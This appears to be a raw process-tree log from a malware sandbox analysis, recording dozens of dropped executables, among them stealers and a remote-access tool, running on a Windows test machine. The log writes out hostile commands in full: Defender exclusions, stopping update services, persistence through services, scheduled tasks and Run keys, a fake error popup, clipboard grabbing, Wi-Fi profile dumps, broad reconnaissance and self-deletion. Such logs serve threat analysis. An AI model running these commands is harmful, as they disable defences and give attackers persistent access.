C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"3⤵
- Suspicious use of SetThreadContext
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exeC:\Users\Admin\AppData\Local\Temp\svchost015.exe4⤵PID:5652
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe"C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"3⤵PID:3184
-
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"4⤵
- Loads dropped DLL
PID:5912
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"3⤵PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"3⤵
- Suspicious use of SetThreadContext
PID:6076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5152
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5160
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe"C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe"3⤵
- Drops file in System32 directory
PID:2188 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:4904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4484
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6108
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:5888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:5624
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2500
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:576
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "PPTBMYWF"4⤵
- Launches sc.exe
PID:4728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "PPTBMYWF" binpath= "C:\ProgramData\wxiftyzsteng\qpgcxlhnvaqc.exe" start= "auto"4⤵
- Launches sc.exe
PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"3⤵PID:5532
-
-
C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5888 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe" & rd /s /q "C:\ProgramData\U3E3EC2VAAAI" & exit4⤵PID:5932
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
PID:2084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5980 -
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5900
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\out.exe"C:\Users\Admin\AppData\Local\Temp\Files\out.exe"3⤵PID:6076
-
C:\Windows\System32\Wbem\wmic.exewmic nic where NetEnabled='true' get MACAddress,Name4⤵PID:1740
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5820
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6112
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5152
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:1468
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6124
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:2032
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:216
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3968
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5300
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4512
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:516
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3960
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6112
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:948
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3936
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3044
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:1868
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3544
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4008
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5848
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4324
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5760
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:888
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4352
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5596
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1476
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5704
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5332
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4332
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:1616
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5640
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5528
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3936
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5000
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:576
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6088
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7132
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3648
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:2396
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7756
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6676
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:1892
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8308
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6744
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8464
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8576
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8696
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8848
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8972
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:9108
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3308
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4852
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:2200
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:9200
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5856
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8424
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7128
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6916
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8804
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8648
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8912
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7160
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6740
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:4768
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7188
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8260
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5176
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8908
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8160
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6448
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3384
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:7816
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:1264
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:9444
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:8524
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:9780
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵PID:5292
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"3⤵PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe"C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\Files\key.exe"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"3⤵PID:1468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 3604⤵
- Program crash
PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"3⤵PID:5976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 2244⤵
- Program crash
PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe"C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1188
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t.exe"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"3⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"3⤵
- Suspicious use of SetThreadContext
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"4⤵
- Checks computer location settings
- Drops file in Windows directory
PID:5184 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"6⤵PID:3312
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"6⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"6⤵PID:3616
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"6⤵PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"6⤵PID:2664
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 4404⤵
- Program crash
PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵PID:3296
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"3⤵
- Suspicious use of SetThreadContext
PID:3968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Program Files directory
PID:4412 -
C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe"C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe"5⤵PID:3428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit4⤵PID:3544
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5612
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:3492
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:5324
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵PID:944
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2174125⤵
- System Location Discovery: System Language Discovery
PID:5296
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PlasmaProfessionalConstitutesGuide" Cheaper5⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N5⤵
- System Location Discovery: System Language Discovery
PID:5280
-
-
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pifPossibly.pif N5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:1680
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:1640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"3⤵
- Checks processor information in registry
PID:2672 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 13004⤵
- Program crash
PID:7568
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe"C:\Users\Admin\AppData\Local\Temp\Files\build11.exe"3⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\onefile_4828_133785306684546397\stub.exeC:\Users\Admin\AppData\Local\Temp\Files\build11.exe4⤵PID:3460
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:6004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:2828
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:1004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵PID:2808
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
PID:396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""5⤵PID:888
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "taskmgr.exe"6⤵
- Kills process with taskkill
PID:5824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:5464 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"6⤵
- Views/modifies file attributes
PID:5140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""5⤵PID:6096
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "MonsterUpdateService"6⤵PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""5⤵PID:4928
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""5⤵PID:5716
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"5⤵PID:1892
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f6⤵
- Adds Run key to start application
PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""5⤵PID:5100
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"6⤵PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"5⤵PID:5628
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe6⤵
- Kills process with taskkill
PID:2500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4172
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"5⤵
- Clipboard Data
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Get-Clipboard6⤵
- Clipboard Data
PID:2280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "chcp"5⤵PID:4280
-
C:\Windows\system32\chcp.comchcp6⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "chcp"5⤵PID:4204
-
C:\Windows\system32\chcp.comchcp6⤵PID:5452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"5⤵
- Network Service Discovery
PID:3804 -
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5704
-
-
C:\Windows\system32\HOSTNAME.EXEhostname6⤵PID:1628
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername6⤵
- Collects information from the system
PID:1536
-
-
C:\Windows\system32\net.exenet user6⤵PID:1364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user7⤵PID:5272
-
-
-
C:\Windows\system32\query.exequery user6⤵PID:1868
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"7⤵PID:5632
-
-
-
C:\Windows\system32\net.exenet localgroup6⤵PID:3384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup7⤵PID:2468
-
-
-
C:\Windows\system32\net.exenet localgroup administrators6⤵PID:2116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators7⤵PID:4092
-
-
-
C:\Windows\system32\net.exenet user guest6⤵PID:6052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest7⤵PID:2808
-
-
-
C:\Windows\system32\net.exenet user administrator6⤵PID:4836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator7⤵PID:5704
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command6⤵PID:6032
-
-
C:\Windows\system32\tasklist.exetasklist /svc6⤵
- Enumerates processes with tasklist
PID:1868
-
-
C:\Windows\system32\ipconfig.exeipconfig /all6⤵
- Gathers network information
PID:3384
-
-
C:\Windows\system32\ROUTE.EXEroute print6⤵PID:1476
-
-
C:\Windows\system32\ARP.EXEarp -a6⤵
- Network Service Discovery
PID:5948
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano6⤵
- System Network Connections Discovery
- Gathers network information
PID:3452
-
-
C:\Windows\system32\sc.exesc query type= service state= all6⤵
- Launches sc.exe
PID:1188
-
-
C:\Windows\system32\netsh.exenetsh firewall show state6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1460
-
-
C:\Windows\system32\netsh.exenetsh firewall show config6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5004 -
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:4276
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:4836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:5620
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:5332
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"3⤵PID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"3⤵
- Suspicious use of SetThreadContext
PID:3940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe4⤵PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\file.exe"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"3⤵
- Adds policy Run key to start application
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
PID:4296 -
C:\ProgramData\tst\remcos.exe"C:\ProgramData\tst\remcos.exe"4⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5776 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"3⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"4⤵PID:1640
-
